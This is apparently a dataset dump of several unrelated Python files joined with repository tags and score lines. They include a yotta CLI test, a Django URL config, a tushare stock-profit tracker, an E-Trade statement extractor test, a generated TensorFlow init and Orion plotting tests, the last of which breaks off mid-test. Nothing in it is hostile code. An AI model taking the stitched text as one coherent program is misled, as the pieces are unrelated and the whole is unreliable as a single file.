# Copyright 2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0
# See LICENSE file for details.
# standard library modules, , ,
import unittest
# internal modules:
from . import util
from . import cli
Test_Outdated = {
'module.json':'''{
"name": "test-outdated",
"version": "0.0.0",
"description": "Test yotta outdated",
"author": "<NAME> <<EMAIL>>",
"license": "Apache-2.0",
"dependencies":{
"test-testing-dummy": "*"
}
}''',
'source/foo.c':'''#include "stdio.h"
int foo(){
printf("foo!\\n");
return 7;
}''',
# test-testing-dummy v0.0.1 (a newer version is available from the registry,
# and will be installed by yt up)
'yotta_modules/test-testing-dummy/module.json':'''{
"name": "test-testing-dummy",
"version": "0.0.1",
"description": "Test yotta's compilation of tests.",
"author": "<NAME> <<EMAIL>>",
"license": "Apache-2.0"
}
'''
}
class TestCLIOutdated(unittest.TestCase):
def test_outdated(self):
path = util.writeTestFiles(Test_Outdated, True)
stdout, stderr, statuscode = cli.run(['-t', 'x86-linux-native', 'outdated'], cwd=path)
self.assertNotEqual(statuscode, 0)
self.assertIn('test-testing-dummy', stdout + stderr)
util.rmRf(path)
def test_notOutdated(self):
path = util.writeTestFiles(Test_Outdated, True)
stdout, stderr, statuscode = cli.run(['-t', 'x86-linux-native', 'up'], cwd=path)
self.assertEqual(statuscode, 0)
stdout, stderr, statuscode = cli.run(['-t', 'x86-linux-native', 'outdated'], cwd=path)
self.assertEqual(statuscode, 0)
self.assertNotIn('test-testing-dummy', stdout + stderr)
util.rmRf(path)
| 2.046875 | 2 |
geoposition/tests/urls.py | Starcross/django-geoposition | 0 | 7817 | <filename>geoposition/tests/urls.py
from django.urls import path, include
from django.contrib import admin
from example.views import poi_list
admin.autodiscover()
urlpatterns = [
path('', poi_list),
path('admin/', admin.site.urls),
]
| 1.835938 | 2 |
A_Stocker/Stocker.py | Allen1218/Python_Project_Interesting | 1 | 7818 | <reponame>Allen1218/Python_Project_Interesting<filename>A_Stocker/Stocker.py
import threading
import tushare as ts
import pandas as pd
import datetime
STOCK = {#'002594':[1,170.15], ## 比亚迪 / 几手,成本价
'601012':[11,99.9], ## 隆基股份
'002340':[12,8.72], ## 格林美
'603259':[1,141.7], ## 药明康德
'002346':[10,10.68], ## 柘中股份
#'600438':[9,42.96], ## 通威股份
#'002475':[3,59.51], ## 立讯精密
#'603308':[1,33.49], ## 应流股份
#'002415': [3, 66.40], ## 海康威视
# '600559':[3,35.3], ## 老白干
# '601100':[1, 114.5], ## 恒立液压
# '603466':[6, 22.40] ## 风语筑
}
TimerNum = 20.0 # s
Total = 0
# #rodo
def get_all_price():
'''process all stock'''
stockCode = list(STOCK.keys())
df = ts.get_realtime_quotes(stockCode)
lp = list(STOCK.values())
stockNum = []
stockCostPrice = []
for i in range(len(lp)):
stockNum.append(lp[i][0])
stockCostPrice.append(lp[i][1])
df['num'] = stockNum
df['stockCostPrice'] = stockCostPrice
# 处理
# profit and lost ratio 盈亏率
plRatio = round((df['price'].astype(float) / df['stockCostPrice'] - 1)*100,2)
# profit and lost 盈亏
df['plRatio'] = plRatio
df['stockNum'] = stockNum
pl = round(df['plRatio'].astype(float) * df['stockNum'] * df['stockCostPrice'].astype(float),2)
df['pl'] = pl
# 当日涨幅 Rise and fall
currentRF = round((df['price'].astype(float) / df['pre_close'].astype(float) - 1)*100,2)
df['currentRF'] = currentRF
df1 = df[[ 'open', 'price', 'stockCostPrice', 'plRatio', 'num','pl', 'currentRF','name']]
pd.set_option('display.unicode.ambiguous_as_wide', True)
pd.set_option('display.unicode.east_asian_width', True)
pd.set_option('display.width', 180) # 设置打印宽度(**重要**)
pd.set_option('display.max_columns', 1000)
pd.set_option('display.width', 1000)
pd.set_option('display.max_colwidth', 1000)
sss = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f)")[:-4]
print('\n')
print("----------------" + sss +"------------------")
print(df1)
sum_int = round(df['pl'].sum(),2)
print("total profit and lost is " + sum_int.astype(str))
print('\n')
# df.to_csv('stock_data.csv', encoding='utf_8_sig', index=None)
global timer
timer = threading.Timer(TimerNum, get_all_price, [])
timer.start()
if __name__ == '__main__':
print(STOCK)
get_all_price()
timer = threading.Timer(TimerNum, get_all_price, [])
timer.start()
| 2.671875 | 3 |
tests/extractors/test_etrade.py | mkazin/StatementRenamer | 0 | 7819 | <filename>tests/extractors/test_etrade.py
from datetime import datetime
from statement_renamer.extractors.etrade import ETradeDateExtractor as EXTRACTOR_UNDER_TEST
from statement_renamer.extractors.factory import ExtractorFactory
TESTDATA = (
"""
PAGE 1 OF 6 February 1, 2019 - March 31, 2019AccountNumber:####-####AccountType:ROTH IRA
PAGE 5 OF 6Account Number: ####-####Statement Period : February 1, 2019 - March 31, 2019Account Type
TolearnmoreabouttheRSDAProgram,pleasereviewyourRSDAProgramCustomerAgreement,visitwww.etrade.com,orcallusat1-800-387-2331
"""
)
def test_monthly_statement():
extractor = EXTRACTOR_UNDER_TEST()
data = extractor.extract(TESTDATA)
new_name = extractor.rename(data)
assert data.get_start_date() == datetime(2019, 2, 1)
assert data.get_end_date() == datetime(2019, 3, 31)
assert new_name == '2019-03 E-Trade Statement.pdf'
def test_factory():
extractor = ExtractorFactory.get_matching_extractor(TESTDATA)
assert isinstance(extractor, EXTRACTOR_UNDER_TEST)
| 2.75 | 3 |
Estrutura_Decisao/who.py | M3nin0/supreme-broccoli | 0 | 7820 | <reponame>M3nin0/supreme-broccoli<gh_stars>0
prod1 = float(input("Insira o valor do produto A: "))
prod2 = float(input("Insira o valor do produto B: "))
prod3 = float(input("Insira o valor do produto C: "))
if prod1 < prod2 and prod1 < prod3:
print ("Escolha o produto A é o mais barato")
elif prod2 < prod1 and prod2 < prod3:
print ("Escolha o produto B é o mais barato")
elif prod3 < prod1 and prod3 < prod2:
print ("Escolha o produto C é o mais barato")
| 3.828125 | 4 |
ProgettoLube/WebInspector/venv/Lib/site-packages/tensorflow/_api/v2/compat/v2/train/experimental/__init__.py | Lube-Project/ProgettoLube | 2 | 7821 | <reponame>Lube-Project/ProgettoLube
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Public API for tf.train.experimental namespace.
"""
from __future__ import print_function as _print_function
import sys as _sys
from tensorflow.python.training.experimental.loss_scale import DynamicLossScale
from tensorflow.python.training.experimental.loss_scale import FixedLossScale
from tensorflow.python.training.experimental.loss_scale import LossScale
from tensorflow.python.training.experimental.mixed_precision import disable_mixed_precision_graph_rewrite
from tensorflow.python.training.experimental.mixed_precision import enable_mixed_precision_graph_rewrite
from tensorflow.python.training.tracking.python_state import PythonState
del _print_function
| 1.28125 | 1 |
SciDataTool/Methods/VectorField/plot_3D_Data.py | BenjaminGabet/SciDataTool | 0 | 7822 | <gh_stars>0
def plot_3D_Data(
self,
*arg_list,
is_norm=False,
unit="SI",
component_list=None,
save_path=None,
x_min=None,
x_max=None,
y_min=None,
y_max=None,
z_min=None,
z_max=None,
z_range=None,
is_auto_ticks=True,
is_auto_range=False,
is_2D_view=False,
is_same_size=False,
N_stem=100,
fig=None,
ax=None,
is_show_fig=None,
is_logscale_x=False,
is_logscale_y=False,
is_logscale_z=False,
thresh=0.02,
is_switch_axes=False,
colormap="RdBu_r",
win_title=None,
font_name="arial",
font_size_title=12,
font_size_label=10,
font_size_legend=8,
):
"""Plots a field as a function of time
Parameters
----------
self : Output
an Output object
Data_str : str
name of the Data Object to plot (e.g. "mag.Br")
*arg_list : list of str
arguments to specify which axes to plot
is_norm : bool
boolean indicating if the field must be normalized
unit : str
unit in which to plot the field
save_path : str
full path including folder, name and extension of the file to save if save_path is not None
x_min : float
minimum value for the x-axis
x_max : float
maximum value for the x-axis
y_min : float
minimum value for the y-axis
y_max : float
maximum value for the y-axis
z_min : float
minimum value for the z-axis
z_max : float
maximum value for the z-axis
is_auto_ticks : bool
in fft, adjust ticks to freqs (deactivate if too close)
is_auto_range : bool
in fft, display up to 1% of max
is_2D_view : bool
True to plot Data in xy plane and put z as colormap
is_same_size : bool
True to have all color blocks with same size in 2D view
N_stem : int
number of harmonics to plot (only for stem plots)
fig : Matplotlib.figure.Figure
existing figure to use if None create a new one
ax : Matplotlib.axes.Axes object
ax on which to plot the data
is_show_fig : bool
True to show figure after plot
is_logscale_x : bool
boolean indicating if the x-axis must be set in logarithmic scale
is_logscale_y : bool
boolean indicating if the y-axis must be set in logarithmic scale
is_logscale_z : bool
boolean indicating if the z-axis must be set in logarithmic scale
thresh : float
threshold for automatic fft ticks
is_switch_axes : bool
to switch x and y axes
"""
# Call the plot on each component
if component_list is None: # default: extract all components
component_list = self.components.keys()
for i, comp in enumerate(component_list):
if save_path is not None and len(component_list) > 1:
save_path_comp = (
save_path.split(".")[0] + "_" + comp + "." + save_path.split(".")[1]
)
else:
save_path_comp = save_path
self.components[comp].plot_3D_Data(
arg_list,
is_norm=is_norm,
unit=unit,
save_path=save_path_comp,
x_min=x_min,
x_max=x_max,
y_min=y_min,
y_max=y_max,
z_min=z_min,
z_max=z_max,
colormap=colormap,
is_auto_ticks=is_auto_ticks,
is_auto_range=is_auto_range,
is_2D_view=is_2D_view,
is_same_size=is_same_size,
N_stem=N_stem,
fig=fig,
ax=ax,
is_show_fig=is_show_fig,
is_logscale_x=is_logscale_x,
is_logscale_y=is_logscale_y,
is_logscale_z=is_logscale_z,
thresh=thresh,
is_switch_axes=is_switch_axes,
win_title=win_title,
font_name=font_name,
font_size_title=font_size_title,
font_size_label=font_size_label,
font_size_legend=font_size_legend,
)
| 2.609375 | 3 |
tests/unittests/plotting/test_plotly_backend.py | obilaniu/orion | 1 | 7823 | <reponame>obilaniu/orion<filename>tests/unittests/plotting/test_plotly_backend.py
"""Collection of tests for :mod:`orion.plotting.backend_plotly`."""
import copy
import numpy
import pandas
import plotly
import pytest
import orion.client
from orion.analysis.partial_dependency_utils import partial_dependency_grid
from orion.core.worker.experiment import Experiment
from orion.plotting.base import (
lpi,
parallel_coordinates,
partial_dependencies,
rankings,
regret,
regrets,
)
from orion.testing import create_experiment
from orion.testing.plotting import (
assert_lpi_plot,
assert_parallel_coordinates_plot,
assert_partial_dependencies_plot,
assert_rankings_plot,
assert_regret_plot,
assert_regrets_plot,
)
config = dict(
name="experiment-name",
space={"x": "uniform(0, 200)"},
metadata={
"user": "test-user",
"orion_version": "XYZ",
"VCS": {
"type": "git",
"is_dirty": False,
"HEAD_sha": "test",
"active_branch": None,
"diff_sha": "diff",
},
},
version=1,
pool_size=1,
max_trials=10,
working_dir="",
algorithms={"random": {"seed": 1}},
producer={"strategy": "NoParallelStrategy"},
)
trial_config = {
"experiment": 0,
"status": "completed",
"worker": None,
"start_time": None,
"end_time": None,
"heartbeat": None,
"results": [],
"params": [],
}
def mock_space(x="uniform(0, 6)", y="uniform(0, 3)", **kwargs):
"""Build a mocked space"""
mocked_config = copy.deepcopy(config)
mocked_config["space"] = {"x": x}
if y is not None:
mocked_config["space"]["y"] = y
mocked_config["space"].update(kwargs)
return mocked_config
def mock_experiment(
monkeypatch, ids=None, x=None, y=None, z=None, objectives=None, status=None
):
"""Mock experiment to_pandas to return given data (or default one)"""
if ids is None:
ids = ["a", "b", "c", "d"]
if x is None:
x = [0, 1, 2, 4]
if y is None:
y = [3, 2, 0, 1]
if objectives is None:
objectives = [0.1, 0.2, 0.3, 0.5]
if status is None:
status = ["completed", "completed", "completed", "completed"]
data = {
"id": ids,
"x": x,
"objective": objectives,
"status": status,
"suggested": ids,
}
if not isinstance(y, str):
data["y"] = y
if z is not None:
data["z"] = z
def to_pandas(self, with_evc_tree=False):
return pandas.DataFrame(data=data)
monkeypatch.setattr(Experiment, "to_pandas", to_pandas)
def mock_experiment_with_random_to_pandas(monkeypatch, status=None, unbalanced=False):
def to_pandas(self, with_evc_tree=False):
if unbalanced:
N = numpy.random.randint(5, 15)
elif status is not None:
N = len(status)
else:
N = 10
ids = numpy.arange(N)
x = numpy.random.normal(0, 0.1, size=N)
y = numpy.random.normal(0, 0.1, size=N)
objectives = numpy.random.normal(0, 0.1, size=N)
if status is None:
exp_status = ["completed"] * N
else:
exp_status = status
data = pandas.DataFrame(
data={
"id": ids,
"x": x,
"y": y,
"objective": objectives,
"status": exp_status,
"suggested": ids,
}
)
return data
monkeypatch.setattr(Experiment, "to_pandas", to_pandas)
def mock_model():
"""Return a mocked regressor which just predict iterated integers"""
class Model:
"""Mocked Regressor"""
def __init__(self):
self.i = 0
def predict(self, data):
"""Returns counting of predictions requested."""
data = numpy.arange(data.shape[0]) + self.i
self.i += data.shape[0]
return data # + numpy.random.normal(0, self.i, size=data.shape[0])
return Model()
def mock_train_regressor(monkeypatch, assert_model=None, assert_model_kwargs=None):
"""Mock the train_regressor to return the mocked regressor instead"""
def train_regressor(model, data, **kwargs):
"""Return the mocked model, and then model argument if requested"""
if assert_model:
assert model == assert_model
if assert_model_kwargs:
assert kwargs == assert_model_kwargs
return mock_model()
monkeypatch.setattr(
"orion.analysis.partial_dependency_utils.train_regressor", train_regressor
)
@pytest.mark.usefixtures("version_XYZ")
class TestLPI:
"""Tests the ``lpi()`` method provided by the plotly backend"""
def test_requires_argument(self):
"""Tests that the experiment data are required."""
with pytest.raises(ValueError):
lpi(None)
def test_returns_plotly_object(self):
"""Tests that the plotly backend returns a plotly object"""
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = lpi(experiment, model_kwargs=dict(random_state=1))
assert type(plot) is plotly.graph_objects.Figure
def test_graph_layout(self, monkeypatch):
"""Tests the layout of the plot"""
config = mock_space()
mock_experiment(monkeypatch)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = lpi(experiment, model_kwargs=dict(random_state=1))
df = experiment.to_pandas()
assert df["x"].tolist() == [0, 1, 2, 4]
assert df["y"].tolist() == [3, 2, 0, 1]
assert df["objective"].tolist() == [0.1, 0.2, 0.3, 0.5]
assert_lpi_plot(plot, dims=["x", "y"])
def test_experiment_worker_as_parameter(self, monkeypatch):
"""Tests that ``Experiment`` is a valid parameter"""
config = mock_space()
mock_experiment(monkeypatch)
with create_experiment(config, trial_config, ["completed"]) as (
_,
experiment,
_,
):
plot = lpi(experiment, model_kwargs=dict(random_state=1))
assert_lpi_plot(plot, dims=["x", "y"])
def test_ignore_uncompleted_statuses(self, monkeypatch):
"""Tests that uncompleted statuses are ignored"""
config = mock_space()
mock_experiment(
monkeypatch,
ids="abcdefgh",
x=[0, 0, 0, 1, 0, 2, 0, 3],
y=[1, 0, 0, 2, 0, 0, 0, 3],
objectives=[0.1, None, None, 0.2, None, 0.3, None, 0.5],
status=[
"completed",
"new",
"reserved",
"completed",
"broken",
"completed",
"interrupted",
"completed",
],
)
with create_experiment(config, trial_config) as (_, _, experiment):
plot = lpi(experiment)
assert_lpi_plot(plot, dims=["x", "y"])
def test_multidim(self, monkeypatch):
"""Tests that dimensions with shape > 1 are flattened properly"""
config = mock_space(y="uniform(0, 3, shape=2)")
mock_experiment(monkeypatch, y=[[3, 3], [2, 3], [1, 2], [0, 3]])
with create_experiment(config, trial_config) as (_, _, experiment):
plot = lpi(experiment, model_kwargs=dict(random_state=1))
assert_lpi_plot(plot, dims=["x", "y[0]", "y[1]"])
def test_fidelity(self, monkeypatch):
"""Tests that fidelity is supported"""
config = mock_space(y="fidelity(1, 200, base=3)")
mock_experiment(monkeypatch, y=[1, 3 ** 2, 1, 3 ** 4])
with create_experiment(config, trial_config) as (_, _, experiment):
plot = lpi(experiment, model_kwargs=dict(random_state=1))
assert_lpi_plot(plot, dims=["x", "y"])
def test_categorical(self, monkeypatch):
"""Tests that categorical is supported"""
config = mock_space(y='choices(["a", "b", "c"])')
mock_experiment(monkeypatch, y=["c", "c", "a", "b"])
with create_experiment(config, trial_config) as (_, _, experiment):
plot = lpi(experiment, model_kwargs=dict(random_state=1))
assert_lpi_plot(plot, dims=["x", "y"])
def test_categorical_multidim(self, monkeypatch):
"""Tests that multidim categorical is supported"""
config = mock_space(y='choices(["a", "b", "c"], shape=3)')
mock_experiment(
monkeypatch,
y=[["c", "b", "a"], ["c", "a", "c"], ["a", "b", "a"], ["c", "b", "b"]],
)
with create_experiment(config, trial_config) as (_, _, experiment):
plot = lpi(experiment, model_kwargs=dict(random_state=1))
assert_lpi_plot(plot, dims=["x", "y[0]", "y[1]", "y[2]"])
@pytest.mark.usefixtures("version_XYZ")
class TestParallelCoordinates:
"""Tests the ``parallel_coordinates()`` method provided by the plotly backend"""
def test_requires_argument(self):
"""Tests that the experiment data are required."""
with pytest.raises(ValueError):
parallel_coordinates(None)
def test_returns_plotly_object(self):
"""Tests that the plotly backend returns a plotly object"""
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = parallel_coordinates(experiment)
assert type(plot) is plotly.graph_objects.Figure
def test_graph_layout(self):
"""Tests the layout of the plot"""
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = parallel_coordinates(experiment)
assert_parallel_coordinates_plot(plot, order=["x", "loss"])
def test_experiment_worker_as_parameter(self):
"""Tests that ``Experiment`` is a valid parameter"""
with create_experiment(config, trial_config, ["completed"]) as (
_,
experiment,
_,
):
plot = parallel_coordinates(experiment)
assert_parallel_coordinates_plot(plot, order=["x", "loss"])
def test_ignore_uncompleted_statuses(self):
"""Tests that uncompleted statuses are ignored"""
with create_experiment(config, trial_config) as (_, _, experiment):
plot = parallel_coordinates(experiment)
assert_parallel_coordinates_plot(plot, order=["x", "loss"])
def test_unsupported_order_key(self):
"""Tests that unsupported order keys are rejected"""
with create_experiment(config, trial_config) as (_, _, experiment):
with pytest.raises(ValueError):
parallel_coordinates(experiment, order=["unsupported"])
def test_order_columns(self):
"""Tests that columns are sorted according to ``order``"""
multidim_config = copy.deepcopy(config)
for k in "yzutv":
multidim_config["space"][k] = "uniform(0, 200)"
with create_experiment(multidim_config, trial_config) as (_, _, experiment):
plot = parallel_coordinates(experiment, order="vzyx")
assert_parallel_coordinates_plot(plot, order=["v", "z", "y", "x", "loss"])
def test_multidim(self):
"""Tests that dimensions with shape > 1 are flattened properly"""
multidim_config = copy.deepcopy(config)
multidim_config["space"]["y"] = "uniform(0, 200, shape=4)"
with create_experiment(multidim_config, trial_config) as (_, _, experiment):
plot = parallel_coordinates(experiment)
assert_parallel_coordinates_plot(
plot, order=["x", "y[0]", "y[1]", "y[2]", "y[3]", "loss"]
)
def test_fidelity(self):
"""Tests that fidelity is set to first column by default"""
fidelity_config = copy.deepcopy(config)
fidelity_config["space"]["z"] = "fidelity(1, 200, base=3)"
with create_experiment(fidelity_config, trial_config) as (_, _, experiment):
plot = parallel_coordinates(experiment)
assert_parallel_coordinates_plot(plot, order=["z", "x", "loss"])
def test_categorical(self):
"""Tests that categorical is supported"""
categorical_config = copy.deepcopy(config)
categorical_config["space"]["z"] = 'choices(["a", "b", "c"])'
with create_experiment(categorical_config, trial_config) as (_, _, experiment):
plot = parallel_coordinates(experiment)
assert_parallel_coordinates_plot(plot, order=["x", "z", "loss"])
def test_categorical_multidim(self):
"""Tests that multidim categorical is supported"""
categorical_config = copy.deepcopy(config)
categorical_config["space"]["z"] = 'choices(["a", "b", "c"], shape=3)'
with create_experiment(categorical_config, trial_config) as (_, _, experiment):
plot = parallel_coordinates(experiment)
assert_parallel_coordinates_plot(
plot, order=["x", "z[0]", "z[1]", "z[2]", "loss"]
)
@pytest.mark.usefixtures("version_XYZ")
class TestPartialDependencies:
"""Tests the ``partial_dependencies()`` method provided by the plotly backend"""
def test_returns_plotly_object(self, monkeypatch):
"""Tests that the plotly backend returns a plotly object"""
mock_train_regressor(monkeypatch)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = partial_dependencies(
experiment, n_grid_points=5, model_kwargs=dict(random_state=1)
)
assert type(plot) is plotly.graph_objects.Figure
def test_graph_layout(self, monkeypatch):
"""Tests the layout of the plot"""
mock_train_regressor(monkeypatch)
config = mock_space()
mock_experiment(monkeypatch)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = partial_dependencies(
experiment, n_grid_points=5, model_kwargs=dict(random_state=1)
)
df = experiment.to_pandas()
assert df["x"].tolist() == [0, 1, 2, 4]
assert df["y"].tolist() == [3, 2, 0, 1]
assert df["objective"].tolist() == [0.1, 0.2, 0.3, 0.5]
assert_partial_dependencies_plot(plot, dims=["x", "y"])
def test_ignore_uncompleted_statuses(self, monkeypatch):
"""Tests that uncompleted statuses are ignored"""
mock_train_regressor(monkeypatch)
config = mock_space()
mock_experiment(
monkeypatch,
ids="abcdefgh",
x=[0, 0, 0, 1, 0, 2, 0, 3],
y=[1, 0, 0, 2, 0, 0, 0, 3],
objectives=[0.1, None, None, 0.2, None, 0.3, None, 0.5],
status=[
"completed",
"new",
"reserved",
"completed",
"broken",
"completed",
"interrupted",
"completed",
],
)
with create_experiment(config, trial_config) as (_, _, experiment):
plot = partial_dependencies(experiment, n_grid_points=5)
assert_partial_dependencies_plot(plot, dims=["x", "y"])
def test_multidim(self, monkeypatch):
"""Tests that dimensions with shape > 1 are flattened properly"""
mock_train_regressor(monkeypatch)
config = mock_space(y="uniform(0, 3, shape=2)")
mock_experiment(monkeypatch, y=[[3, 3], [2, 3], [1, 2], [0, 3]])
with create_experiment(config, trial_config) as (_, _, experiment):
plot = partial_dependencies(
experiment, n_grid_points=5, model_kwargs=dict(random_state=1)
)
assert_partial_dependencies_plot(plot, dims=["x", "y[0]", "y[1]"])
def test_fidelity(self, monkeypatch):
"""Tests that fidelity is supported"""
mock_train_regressor(monkeypatch)
config = mock_space(y="fidelity(1, 200, base=3)")
mock_experiment(monkeypatch, y=[1, 3 ** 2, 1, 3 ** 4])
with create_experiment(config, trial_config) as (_, _, experiment):
plot = partial_dependencies(
experiment, n_grid_points=5, model_kwargs=dict(random_state=1)
)
assert_partial_dependencies_plot(plot, dims=["x", "y"], log_dims=["y"])
def test_categorical(self, monkeypatch):
"""Tests that categorical is supported"""
mock_train_regressor(monkeypatch)
config = mock_space(y='choices(["a", "b", "c"])')
mock_experiment(monkeypatch, y=["c", "c", "a", "b"])
with create_experiment(config, trial_config) as (_, _, experiment):
plot = partial_dependencies(
experiment, n_grid_points=5, model_kwargs=dict(random_state=1)
)
# There is only 3 categories, so test must be adjusted accordingly.
assert_partial_dependencies_plot(
plot, dims=["x", "y"], n_grid_points={"x": 5, "y": 3}
)
def test_categorical_multidim(self, monkeypatch):
"""Tests that multidim categorical is supported"""
mock_train_regressor(monkeypatch)
config = mock_space(y='choices(["a", "b", "c"], shape=3)')
mock_experiment(
monkeypatch,
y=[["c", "b", "a"], ["c", "a", "c"], ["a", "b", "a"], ["c", "b", "b"]],
)
with create_experiment(config, trial_config) as (_, _, experiment):
plot = partial_dependencies(
experiment, n_grid_points=5, model_kwargs=dict(random_state=1)
)
assert_partial_dependencies_plot(
plot,
dims=["x", "y[0]", "y[1]", "y[2]"],
n_grid_points={"x": 5, "y[0]": 3, "y[1]": 3, "y[2]": 3},
)
def test_logarithmic_scales_first(self, monkeypatch):
"""Test that log dims are turn to log scale
Test first dim specifically because special xaxis name for first dim.
"""
mock_train_regressor(monkeypatch)
config = mock_space(x="loguniform(0.001, 1)", z="uniform(0, 1)")
mock_experiment(monkeypatch, x=[0.001, 0.1, 0.01, 1], z=[0, 0.1, 0.2, 0.5])
with create_experiment(config, trial_config) as (_, _, experiment):
plot = partial_dependencies(
experiment, n_grid_points=5, model_kwargs=dict(random_state=1)
)
assert_partial_dependencies_plot(
plot, dims=["x", "y", "z"], n_grid_points=5, log_dims=["x"]
)
def test_logarithmic_scales_any_dim(self, monkeypatch):
"""Test that log dims are turn to log scale"""
mock_train_regressor(monkeypatch)
config = mock_space(y="loguniform(0.001, 1)", z="uniform(0, 1)")
mock_experiment(monkeypatch, y=[0.001, 0.1, 0.01, 1], z=[0, 0.1, 0.2, 0.5])
with create_experiment(config, trial_config) as (_, _, experiment):
plot = partial_dependencies(
experiment, n_grid_points=5, model_kwargs=dict(random_state=1)
)
assert_partial_dependencies_plot(
plot, dims=["x", "y", "z"], n_grid_points=5, log_dims=["y"]
)
def test_int_logarithmic_scales(self, monkeypatch):
"""Test that int log dims are turn to log scale"""
mock_train_regressor(monkeypatch)
config = mock_space(y="loguniform(1, 1000, discrete=True)", z="uniform(0, 1)")
mock_experiment(monkeypatch, y=[1, 10, 100, 1000], z=[0, 0.1, 0.2, 0.5])
with create_experiment(config, trial_config) as (_, _, experiment):
plot = partial_dependencies(
experiment, n_grid_points=5, model_kwargs=dict(random_state=1)
)
assert_partial_dependencies_plot(
plot, dims=["x", "y", "z"], n_grid_points=5, log_dims=["y"]
)
def test_one_param(self, monkeypatch):
"""Test ploting a space with only 1 dim"""
mock_train_regressor(monkeypatch)
config = mock_space(y=None)
mock_experiment(monkeypatch, y="drop")
with create_experiment(config, trial_config) as (_, _, experiment):
plot = partial_dependencies(
experiment, n_grid_points=5, model_kwargs=dict(random_state=1)
)
assert_partial_dependencies_plot(plot, dims=["x"], n_grid_points=5)
def test_select_params(self, monkeypatch):
"""Test selecting subset"""
mock_train_regressor(monkeypatch)
config = mock_space(z="uniform(0, 1)")
mock_experiment(monkeypatch, z=[0, 0.1, 0.2, 0.5])
for params in [["x"], ["x", "y"], ["y", "z"]]:
with create_experiment(config, trial_config) as (_, _, experiment):
plot = partial_dependencies(
experiment,
params=params,
n_grid_points=5,
model_kwargs=dict(random_state=1),
)
assert_partial_dependencies_plot(plot, dims=params, n_grid_points=5)
def test_custom_smoothing(self, monkeypatch):
"""Test changing smoothing value"""
mock_train_regressor(monkeypatch)
config = mock_space()
mock_experiment(monkeypatch)
with create_experiment(config, trial_config) as (_, _, experiment):
plot = partial_dependencies(
experiment,
n_grid_points=5,
model_kwargs=dict(random_state=1),
smoothing=1.2,
)
with pytest.raises(AssertionError):
assert_partial_dependencies_plot(plot, dims=["x", "y"], n_grid_points=5)
assert_partial_dependencies_plot(
plot, dims=["x", "y"], n_grid_points=5, smoothing=1.2
)
def test_custom_n_grid_points(self, monkeypatch):
"""Test changing n_grid_points value"""
mock_train_regressor(monkeypatch)
config = mock_space()
mock_experiment(monkeypatch)
with create_experiment(config, trial_config) as (_, _, experiment):
plot = partial_dependencies(
experiment,
n_grid_points=10,
model_kwargs=dict(random_state=1),
)
with pytest.raises(AssertionError):
assert_partial_dependencies_plot(plot, dims=["x", "y"], n_grid_points=5)
assert_partial_dependencies_plot(plot, dims=["x", "y"], n_grid_points=10)
def test_custom_n_samples(self, monkeypatch):
"""Test changing n_samples value"""
mock_train_regressor(monkeypatch)
config = mock_space()
mock_experiment(monkeypatch)
PARAMS = ["x", "y"]
N_SAMPLES = numpy.random.randint(20, 50)
def mock_partial_dependency_grid(space, model, params, samples, n_points):
print(samples)
assert samples.shape == (N_SAMPLES, len(PARAMS))
return partial_dependency_grid(space, model, params, samples, n_points)
monkeypatch.setattr(
"orion.analysis.partial_dependency_utils.partial_dependency_grid",
mock_partial_dependency_grid,
)
with create_experiment(config, trial_config) as (_, _, experiment):
plot = partial_dependencies(
experiment,
n_grid_points=10,
model_kwargs=dict(random_state=1),
n_samples=N_SAMPLES,
)
def test_custom_colorscale(self, monkeypatch):
"""Test changing colorscale"""
mock_train_regressor(monkeypatch)
config = mock_space()
mock_experiment(monkeypatch)
with create_experiment(config, trial_config) as (_, _, experiment):
plot = partial_dependencies(
experiment,
n_grid_points=5,
colorscale="Viridis",
model_kwargs=dict(random_state=1),
)
with pytest.raises(AssertionError):
assert_partial_dependencies_plot(
plot, dims=["x", "y"], n_grid_points=5, custom_colorscale=False
)
assert_partial_dependencies_plot(
plot, dims=["x", "y"], n_grid_points=5, custom_colorscale=True
)
def test_custom_model(self, monkeypatch):
"""Test changing type of regression model"""
mock_train_regressor(monkeypatch, assert_model="BaggingRegressor")
config = mock_space()
mock_experiment(monkeypatch)
with create_experiment(config, trial_config) as (_, _, experiment):
plot = partial_dependencies(
experiment,
n_grid_points=5,
model="BaggingRegressor",
model_kwargs=dict(random_state=1),
)
def test_custom_model_kwargs(self, monkeypatch):
"""Test changing arguments of regression model"""
mock_train_regressor(monkeypatch, assert_model_kwargs=dict(random_state=1))
config = mock_space()
mock_experiment(monkeypatch)
with create_experiment(config, trial_config) as (_, _, experiment):
plot = partial_dependencies(
experiment,
n_grid_points=5,
model_kwargs=dict(random_state=1),
)
@pytest.mark.usefixtures("version_XYZ")
class TestRankings:
"""Tests the ``rankings()`` method provided by the plotly backend"""
def test_requires_argument(self):
"""Tests that the experiment data are required."""
with pytest.raises(ValueError):
rankings(None)
def test_returns_plotly_object(self, monkeypatch):
"""Tests that the plotly backend returns a plotly object"""
mock_experiment_with_random_to_pandas(monkeypatch)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = rankings([experiment, experiment])
assert type(plot) is plotly.graph_objects.Figure
def test_graph_layout(self, monkeypatch):
"""Tests the layout of the plot"""
mock_experiment_with_random_to_pandas(monkeypatch)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = rankings([experiment])
assert_rankings_plot(plot, [f"{experiment.name}-v{experiment.version}"])
def test_list_of_experiments(self, monkeypatch):
"""Tests the rankings with list of experiments"""
mock_experiment_with_random_to_pandas(monkeypatch)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
child = orion.client.create_experiment(
experiment.name, branching={"branch_to": "child"}
)
plot = rankings([experiment, child])
# Exps are sorted alphabetically by names.
assert_rankings_plot(
plot, [f"{exp.name}-v{exp.version}" for exp in [child, experiment]]
)
def test_list_of_experiments_name_conflict(self, monkeypatch):
"""Tests the rankings with list of experiments with the same name"""
mock_experiment_with_random_to_pandas(monkeypatch)
with create_experiment(config, trial_config, ["completed"]) as (
_,
